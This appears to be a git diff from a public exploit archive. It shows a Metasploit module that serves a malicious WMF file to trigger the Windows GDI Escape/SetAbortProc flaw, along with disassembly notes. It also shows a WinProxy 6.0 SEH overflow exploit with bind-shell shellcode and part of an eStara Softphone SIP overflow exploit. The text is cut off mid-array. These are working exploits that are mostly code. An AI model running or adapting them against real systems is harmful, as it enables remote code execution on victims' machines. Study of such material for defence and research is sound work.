-			0x041B
-		). Pex::Text::RandomData(8)
-	}
-}
-
-
-1;
-
-__END__
-
-Used with permission by san[at]xfocus.org:
-------------------------------------------
-
-The recent wmf vul is really fun, I found some interest things after
-analysed it. I attached a very simple wmf file(64 bytes) which can crash
-your explorer. You can simply change those 0xcc to your shellcode.
-
-An attach wmf file constructs with a 18 bytes metafile header which
-defined as following:
-
-typedef struct _WindowsMetaHeader
-{
-  WORD  FileType;       /* Type of metafile (0=memory, 1=disk) */
-  WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
-  WORD  Version;        /* Version of Microsoft Windows used */
-  DWORD FileSize;       /* Total size of the metafile in WORDs */
-  WORD  NumOfObjects;   /* Number of objects in the file */
-  DWORD MaxRecordSize;  /* The size of largest record in WORDs */
-  WORD  NumOfParams;    /* Not Used (always 0) */
-} WMFHEAD;
-
-and two data records which defined as following:
-
-typedef struct _StandardMetaRecord
-{
-    DWORD Size;          /* Total size of the record in WORDs */
-    WORD  Function;      /* Function number (defined in WINDOWS.H) */
-    WORD  Parameters[];  /* Parameter values passed to function */
-} WMFRECORD;
-
-Somethings that we need to attention:
-
-1. FileSize of _WindowsMetaHeader is in WORDs, don't forget to divide 2;
-2. the attack file is larger than 64 bytes;
-3. the last record always has a function number of 0000h, a Size of
-00000003h, and no Parameters array;
-4. the attack record has a function number of 0626h, which defined in
-wingdi.h. 26h is important, it will flow to Escape function. I found
-it will lead to SetAbortProc only the Parameters[0] is 0009h.
-
-.text:77C4B65C loc_77C4B65C:                           ; CODE XREF: PlayMetaFileRecord+43j
-.text:77C4B65C                                         ; DATA XREF: .text:off_77C769FE+o
-.text:77C4B65C                 push    [ebp+uFlags]    ; case 0x26
-.text:77C4B65F                 push    ebx
-.text:77C4B660                 call    sub_77C4B68A
-.text:77C4B665                 cmp     eax, edi
-.text:77C4B667                 mov     [ebp+var_4], eax
-.text:77C4B66A                 jnz     loc_77C4B424
-.text:77C4B670                 mov     ax, [ebx+6]
-.text:77C4B674                 cmp     ax, 0Fh
-.text:77C4B678                 jnz     loc_77C5FC0A    ; flow to Escape
-...
-.text:77C61062 loc_77C61062:                           ; CODE XREF: Escape+ECB7j
-.text:77C61062                 sub     edi, 6
-.text:77C61065                 jz      short loc_77C61090 ; it flow to SetAbortProc only the Parameters[0] is 0009h
-...
-.text:77C543E7 loc_77C543E7:                           ; CODE XREF: SetAbortProc+54j
-.text:77C543E7                                         ; SetAbortProc+10720tj
-.text:77C543E7                 xor     eax, eax
-.text:77C543E9                 mov     [esi+14h], edi  ; write callback pointer?
-...
-.text:77C604C8 owned:                                  ; CODE XREF: sub_77C4B09C+1E4j
-.text:77C604C8                 mov     eax, [eax+14h]  ; the pointer
-.text:77C604CB                 cmp     eax, ecx
-.text:77C604CD                 jz      loc_77C4B286
-.text:77C604D3                 push    ecx
-.text:77C604D4                 push    edi
-.text:77C604D5                 call    eax             ; got it
-
-Best Regards
---
-san 
-
-# milw0rm.com [2005-12-27]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::ie_xp_pfv_metafile;
+
+use strict;
+use base "Msf::Exploit";
+use Pex::Text;
+use IO::Socket::INET;
+
+my $advanced =
+  {
+  };
+
+my $info =
+  {
+	'Name'           => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution',
+	'Version'        => '$Revision: 1.8 $',
+	'Authors'        =>
+	  [
+		'H D Moore ',
+		'O600KO78RUS[at]unknown.ru'
+	  ],
+
+	'Description'    =>
+	  Pex::Text::Freeform(qq{
+			This module exploits a vulnerability in the GDI library included with
+			Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
+			to execute arbitrary code through the SetAbortProc procedure. This module
+			generates a random WMF record stream for each request.
+}),
+
+	'Arch'           => [ 'x86' ],
+	'OS'             => [ 'win32', 'winxp', 'win2003' ],
+	'Priv'           => 0,
+
+	'UserOpts'       =>
+	  {
+		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
+		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
+	  },
+
+	'Payload'        =>
+	  {
+		'Space'    => 1000 + int(rand(256)) * 4,
+		'BadChars' => "\x00",
+		'Keys'     => ['-bind'],
+	  },
+	'Refs'           =>
+	  [
+	  	['BID', '16074'],
+		['CVE', '2005-4560'],
+	  	['OSVDB', '21987'],
+		['MIL', '111'],	
+		['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
+		['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
+	  ],
+
+	'DefaultTarget'  => 0,
+	'Targets'        =>
+	  [
+		[ 'Automatic - Windows XP / Windows 2003' ]
+	  ],
+	
+	'Keys'           => [ 'wmf' ],
+
+	'DisclosureDate' => 'Dec 27 2005',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit
+{
+	my $self = shift;
+	my $server = IO::Socket::INET->new(
+		LocalHost => $self->GetVar('HTTPHOST'),
+		LocalPort => $self->GetVar('HTTPPORT'),
+		ReuseAddr => 1,
+		Listen    => 1,
+		Proto     => 'tcp'
+	);
+	my $client;
+
+	# Did the listener create fail?
+	if (not defined($server)) {
+		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
+		return;
+	}
+	
+	my $httphost = $self->GetVar('HTTPHOST');
+	if ($httphost eq '0.0.0.0') {
+		$httphost = Pex::Utils::SourceIP('1.2.3.4');
+	}
+
+	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
+
+	while (defined($client = $server->accept())) {
+		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
+	}
+
+	return;
+}
+
+sub HandleHttpClient
+{
+	my $self = shift;
+	my $fd   = shift;
+
+	# Set the remote host information
+	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+		
+
+	# Read the HTTP command
+	my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
+
+ 	
+	if ($url !~ /\.wmf/i) {
+		$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
+		
+		# XXX This could be replaced by obfuscated javascript too...
+		
+		# Transmit the HTTP redirect response
+		$fd->Send(
+			"HTTP/1.0 302 Moved\r\n" .
+			"Location: /". Pex::Text::AlphaNumText(int(rand(1024)+1))  .".wmf\r\n" .
+			"Content-Type: text/html\r\n" .
+			"Content-Length: 0\r\n" .
+			"Connection: close\r\n" .
+			"\r\n"
+		  );
+
+		$fd->Close();
+		
+		return;		
+	}
+	
+	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+
+	# Push our minimum length just over the ethernet MTU
+	my $pre_mlen = 1440 + rand(8192);
+	my $suf_mlen = rand(8192)+128;
+	
+	# The number of random objects we generated
+	my $fill = 0;
+	
+	# The buffer of random bogus objects
+	my $pre_buff = "";
+	my $suf_buff = "";
+
+	while (length($pre_buff) < $pre_mlen && $fill < 65535) {
+		$pre_buff .= RandomWMFRecord();
+		$fill += 1;
+	}
+
+	while (length($suf_buff) < $suf_mlen && $fill < 65535) {
+		$suf_buff .= RandomWMFRecord();
+		$fill += 1;
+	}
+
+	my $clen = 18 + 8 + 6 + length($shellcode) + length($pre_buff) + length($suf_buff);
+	my $content =
+		#
+		# WindowsMetaHeader
+		#
+		pack('vvvVvVv',
+				# WORD  FileType;       /* Type of metafile (0=memory, 1=disk, 2=fjear) */
+				2,
+				# WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
+				9,
+				# WORD  Version;        /* Version of Microsoft Windows used */
+				0x0300,
+				# DWORD FileSize;       /* Total size of the metafile in WORDs */
+				$clen/2,
+				# WORD  NumOfObjects;   /* Number of objects in the file */
+				$fill+1,
+				# DWORD MaxRecordSize;  /* The size of largest record in WORDs */
+				int(rand(64)+8),
+				# WORD  NumOfParams;    /* Not Used (always 0) */
+				0
+		).
+		#
+		# Filler data
+		#
+		$pre_buff.
+		#
+		# StandardMetaRecord - Escape()
+		#
+		pack('Vvv',
+			# DWORD Size;          /* Total size of the record in WORDs */
+			4,
+			# WORD  Function;      /* Function number (defined in WINDOWS.H) */
+			0x0026,                # Can also be 0xff26, 0x0626, etc...
+			# WORD  Parameters[];  /* Parameter values passed to function */
+			9,
+		). $shellcode .
+		#
+		# Filler data
+		#
+		$suf_buff.
+		#
+		# Complete the structure
+		#
+		pack('Vv',
+			3,
+			0
+		);
+
+	
+	$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
+
+
+	# Transmit the HTTP response
+	my $req = 		
+		"HTTP/1.0 200 OK\r\n" .
+		"Content-Type: text/plain\r\n" .
+		"Content-Length: " . length($content) . "\r\n" .
+		"Connection: close\r\n" .
+		"\r\n" .
+		$content;
+		
+		
+	my $res = $fd->Send($req);
+
+	# Prevents IE from throwing an error in some cases
+	select(undef, undef, undef, 0.1);
+	
+	$fd->Close();
+	
+	# The Content-Disposition trick was not very reliable (2003 ignores it)
+	#    "Content-Disposition: inline; filename=". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".jpg\r\n".
+}
+
+
+sub RandomWMFRecord {
+	my $type = int(rand(3));
+
+	if ($type == 0)	{
+		# CreatePenIndirect
+		return pack('Vv',
+			8,
+			0x02FA
+		). Pex::Text::RandomData(10)
+	}
+	elsif ( $type == 1 ) {
+		# CreateBrushIndirect
+		return pack('Vv',
+			7,
+			0x02FC
+		). Pex::Text::RandomData(8)
+	}
+	else {
+		# Rectangle
+		return pack('Vv',
+			7,
+			0x041B
+		). Pex::Text::RandomData(8)
+	}
+}
+
+
+1;
+
+__END__
+
+Used with permission by san[at]xfocus.org:
+------------------------------------------
+
+The recent wmf vul is really fun, I found some interest things after
+analysed it. I attached a very simple wmf file(64 bytes) which can crash
+your explorer. You can simply change those 0xcc to your shellcode.
+
+An attach wmf file constructs with a 18 bytes metafile header which
+defined as following:
+
+typedef struct _WindowsMetaHeader
+{
+  WORD  FileType;       /* Type of metafile (0=memory, 1=disk) */
+  WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
+  WORD  Version;        /* Version of Microsoft Windows used */
+  DWORD FileSize;       /* Total size of the metafile in WORDs */
+  WORD  NumOfObjects;   /* Number of objects in the file */
+  DWORD MaxRecordSize;  /* The size of largest record in WORDs */
+  WORD  NumOfParams;    /* Not Used (always 0) */
+} WMFHEAD;
+
+and two data records which defined as following:
+
+typedef struct _StandardMetaRecord
+{
+    DWORD Size;          /* Total size of the record in WORDs */
+    WORD  Function;      /* Function number (defined in WINDOWS.H) */
+    WORD  Parameters[];  /* Parameter values passed to function */
+} WMFRECORD;
+
+Somethings that we need to attention:
+
+1. FileSize of _WindowsMetaHeader is in WORDs, don't forget to divide 2;
+2. the attack file is larger than 64 bytes;
+3. the last record always has a function number of 0000h, a Size of
+00000003h, and no Parameters array;
+4. the attack record has a function number of 0626h, which defined in
+wingdi.h. 26h is important, it will flow to Escape function. I found
+it will lead to SetAbortProc only the Parameters[0] is 0009h.
+
+.text:77C4B65C loc_77C4B65C:                           ; CODE XREF: PlayMetaFileRecord+43j
+.text:77C4B65C                                         ; DATA XREF: .text:off_77C769FE+o
+.text:77C4B65C                 push    [ebp+uFlags]    ; case 0x26
+.text:77C4B65F                 push    ebx
+.text:77C4B660                 call    sub_77C4B68A
+.text:77C4B665                 cmp     eax, edi
+.text:77C4B667                 mov     [ebp+var_4], eax
+.text:77C4B66A                 jnz     loc_77C4B424
+.text:77C4B670                 mov     ax, [ebx+6]
+.text:77C4B674                 cmp     ax, 0Fh
+.text:77C4B678                 jnz     loc_77C5FC0A    ; flow to Escape
+...
+.text:77C61062 loc_77C61062:                           ; CODE XREF: Escape+ECB7j
+.text:77C61062                 sub     edi, 6
+.text:77C61065                 jz      short loc_77C61090 ; it flow to SetAbortProc only the Parameters[0] is 0009h
+...
+.text:77C543E7 loc_77C543E7:                           ; CODE XREF: SetAbortProc+54j
+.text:77C543E7                                         ; SetAbortProc+10720tj
+.text:77C543E7                 xor     eax, eax
+.text:77C543E9                 mov     [esi+14h], edi  ; write callback pointer?
+...
+.text:77C604C8 owned:                                  ; CODE XREF: sub_77C4B09C+1E4j
+.text:77C604C8                 mov     eax, [eax+14h]  ; the pointer
+.text:77C604CB                 cmp     eax, ecx
+.text:77C604CD                 jz      loc_77C4B286
+.text:77C604D3                 push    ecx
+.text:77C604D4                 push    edi
+.text:77C604D5                 call    eax             ; got it
+
+Best Regards
+--
+san 
+
+# milw0rm.com [2005-12-27]
diff --git a/platforms/windows/remote/1408.pl b/platforms/windows/remote/1408.pl
index 72043584b..babf39730 100755
--- a/platforms/windows/remote/1408.pl
+++ b/platforms/windows/remote/1408.pl
@@ -1,90 +1,90 @@
-#!perl
-#
-# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
-#
-# Author:  FistFucker (aka FistFuXXer)
-# e-Mail:  FistFuXXer@gmx.de
-#
-#
-# Advisory:
-# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
-#
-# CVE info:
-# CAN-2005-4085
-#
-
-use IO::Socket;
-
-#
-# destination IP address
-#
-$ip = '127.0.0.1';
-
-#
-# destination TCP port
-#
-$port = 80;
-
-#
-# SE handler. 0x00, 0x0a, 0x0d free
-#
-$seh = reverse( "\x01\x03\x12\x40" );  # POP/POP/RET
-                                       # PAVDLL.01031240
-
-#
-# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
-#
-$jmp = "\x90\x90\xeb\x32";             # [NOP][NOP][JMP|JMP]
-
-#
-# 0x00, 0x0a, 0x0d free shellcode
-#
-# win32_bind -  EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
-#
-$sc = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
-      "\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\xce\x75\x92\x5c".
-      "\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x5e\x8d\x82\x28".
-      "\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\xc8\xbd\xad\x3a".
-      "\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x1d\xd8\x49\x8b".
-      "\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x79\x90\x6c\x48".
-      "\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\xad\xcf\x5d\x28".
-      "\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x68\x82\x81\xf3".
-      "\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x79\xd8\x92\x73".
-      "\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\xa7\x61\x65\xa1".
-      "\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\xf0\xdf\x3e\xf0".
-      "\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x40\xdf\xe4\x42".
-      "\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x73\x73\xbd\xcb".
-      "\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\xc3\xc5\xeb\xea".
-      "\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x5f\x4a\x14\xf4".
-      "\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\xaf\x69\x07\xf3".
-      "\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x8c\x72\x2f\x8e".
-      "\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\xd8\x3f\x7b\x5c".
-      "\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x77\xdd\x38\xf2".
-      "\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\xd9\xbb\x92\x73".
-      "\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x58\x54\x8f\xd0".
-      "\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";
-
-
-print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."\n\n";
-
-$sock = IO::Socket::INET->new
-(
-
-    PeerAddr => $ip,
-    PeerPort => $port,
-    Proto    => 'tcp',
-    Timeout  => 2
-
-) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
-
-print "[+] Connected.\n";
-print "[+] Trying to overwrite SE handler...\n";
-
-$sock->send( "GET / HTTP/1.0\r\n" );
-$sock->send( 'Host: 127.0.0.1:'. "\x90" x 23 . $jmp . $seh . "\x90" x 50 . $sc ."\r\n\r\n" );
-
-print "[+] Done. Now check for bind shell on $ip:4444!";
-
-close($sock);
-
-# milw0rm.com [2006-01-07]
+#!perl
+#
+# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
+#
+# Author:  FistFucker (aka FistFuXXer)
+# e-Mail:  FistFuXXer@gmx.de
+#
+#
+# Advisory:
+# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
+#
+# CVE info:
+# CAN-2005-4085
+#
+
+use IO::Socket;
+
+#
+# destination IP address
+#
+$ip = '127.0.0.1';
+
+#
+# destination TCP port
+#
+$port = 80;
+
+#
+# SE handler. 0x00, 0x0a, 0x0d free
+#
+$seh = reverse( "\x01\x03\x12\x40" );  # POP/POP/RET
+                                       # PAVDLL.01031240
+
+#
+# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
+#
+$jmp = "\x90\x90\xeb\x32";             # [NOP][NOP][JMP|JMP]
+
+#
+# 0x00, 0x0a, 0x0d free shellcode
+#
+# win32_bind -  EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
+#
+$sc = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
+      "\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\xce\x75\x92\x5c".
+      "\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x5e\x8d\x82\x28".
+      "\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\xc8\xbd\xad\x3a".
+      "\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x1d\xd8\x49\x8b".
+      "\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x79\x90\x6c\x48".
+      "\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\xad\xcf\x5d\x28".
+      "\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x68\x82\x81\xf3".
+      "\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x79\xd8\x92\x73".
+      "\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\xa7\x61\x65\xa1".
+      "\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\xf0\xdf\x3e\xf0".
+      "\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x40\xdf\xe4\x42".
+      "\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x73\x73\xbd\xcb".
+      "\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\xc3\xc5\xeb\xea".
+      "\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x5f\x4a\x14\xf4".
+      "\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\xaf\x69\x07\xf3".
+      "\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x8c\x72\x2f\x8e".
+      "\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\xd8\x3f\x7b\x5c".
+      "\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x77\xdd\x38\xf2".
+      "\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\xd9\xbb\x92\x73".
+      "\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x58\x54\x8f\xd0".
+      "\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";
+
+
+print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."\n\n";
+
+$sock = IO::Socket::INET->new
+(
+
+    PeerAddr => $ip,
+    PeerPort => $port,
+    Proto    => 'tcp',
+    Timeout  => 2
+
+) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
+
+print "[+] Connected.\n";
+print "[+] Trying to overwrite SE handler...\n";
+
+$sock->send( "GET / HTTP/1.0\r\n" );
+$sock->send( 'Host: 127.0.0.1:'. "\x90" x 23 . $jmp . $seh . "\x90" x 50 . $sc ."\r\n\r\n" );
+
+print "[+] Done. Now check for bind shell on $ip:4444!";
+
+close($sock);
+
+# milw0rm.com [2006-01-07]
diff --git a/platforms/windows/remote/1413.c b/platforms/windows/remote/1413.c
index 4a0ebf5fb..a64c8817a 100755
--- a/platforms/windows/remote/1413.c
+++ b/platforms/windows/remote/1413.c
@@ -1,377 +1,377 @@
-/***************************************
-eStara Softphone buffer overflow exploit
-tested on :
-	eStara Softphone 3.0.1.14
-		||||||
-	eStara Softphone 3.0.1.46
-Vender website : http://www.estara.com/softphone/softph.exe
-
-Run this application, then use nc to send builded packet :
-nc -u 127.0.0.1 5060 
-#include 
-
-unsigned char invite[] = {
-	0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x20, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 
-	0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x0D, 0x0A, 
-	0x56, 0x69, 0x61, 0x3A, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x2F, 0x55, 0x44, 0x50, 
-	0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x3A, 0x33, 0x33, 0x33, 0x33, 
-	0x3B, 0x62, 0x72, 0x61, 0x6E, 0x63, 0x68, 0x3D, 0x7A, 0x39, 0x68, 0x47, 0x34, 0x62, 0x4B, 0x30, 
-	0x30, 0x30, 0x30, 0x34, 0x31, 0x37, 0x38, 0x7A, 0x39, 0x68, 0x47, 0x34, 0x62, 0x4B, 0x2E, 0x30, 
-	0x30, 0x30, 0x30, 0x32, 0x46, 0x32, 0x41, 0x0D, 0x0A, 0x46, 0x72, 0x6F, 0x6D, 0x3A, 0x20, 0x34, 
-	0x31, 0x37, 0x38, 0x20, 0x3C, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 
-	0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x3B, 0x74, 0x61, 0x67, 0x3D, 0x34, 0x31, 0x37, 0x38, 0x0D, 0x0A, 
-	0x54, 0x6F, 0x3A, 0x20, 0x52, 0x65, 0x63, 0x65, 0x69, 0x76, 0x65, 0x72, 0x20, 0x3C, 0x73, 0x69, 
-	0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x0D, 0x0A, 
-	0x43, 0x61, 0x6C, 0x6C, 0x2D, 0x49, 0x44, 0x3A, 0x20, 0x32, 0x34, 0x34, 0x33, 0x30, 0x40, 0x31, 
-	0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x0D, 0x0A, 0x43, 0x53, 0x65, 0x71, 0x3A, 
-	0x20, 0x31, 0x38, 0x32, 0x32, 0x35, 0x20, 0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x0D, 0x0A, 0x43, 
-	0x6F, 0x6E, 0x74, 0x61, 0x63, 0x74, 0x3A, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x3C, 0x73, 0x69, 
-	0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x0D, 0x0A, 
-	0x45, 0x78, 0x70, 0x69, 0x72, 0x65, 0x73, 0x3A, 0x20, 0x31, 0x32, 0x30, 0x30, 0x0D, 0x0A, 0x4D, 
-	0x61, 0x78, 0x2D, 0x46, 0x6F, 0x72, 0x77, 0x61, 0x72, 0x64, 0x73, 0x3A, 0x20, 0x37, 0x30, 0x0D, 
-	0x0A, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x54, 0x79, 0x70, 0x65, 0x3A, 0x20, 0x61, 
-	0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x2F, 0x73, 0x64, 0x70, 0x0D, 0x0A, 
-	0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x4C, 0x65, 0x6E, 0x67, 0x74, 0x68, 0x3A, 0x20, 
-	0x34, 0x32, 0x32, 0x32, 0x0D, 0x0A, 0x0D, 0x0A, 0x76, 0x3D, 0x30, 0x0D, 0x0A, 0x6F, 0x3D, 0x34, 
-	0x31, 0x37, 0x38, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x49, 0x4E, 
-	0x20, 0x49, 0x50, 0x34, 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x0D, 
-	0x0A, 0x73, 0x3D, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x53, 0x44, 0x50, 0x0D, 0x0A, 
-	0x63, 0x3D, 0x49, 0x4E, 0x20, 0x49, 0x50, 0x34, 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 
-	0x33, 0x2E, 0x36, 0x0D, 0x0A, 0x74, 0x3D, 0x30, 0x20, 0x30, 0x0D, 0x0A, 0x6D, 0x3D, 0x61, 0x75, 
-	0x64, 0x69, 0x6F, 0x20, 0x39, 0x38, 0x37, 0x36, 0x20, 0x52, 0x54, 0x50, 0x2F, 0x41, 0x56, 0x50, 
-	0x20, 0x30, 0x0D, 0x0A, 0x61, 0x3D, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
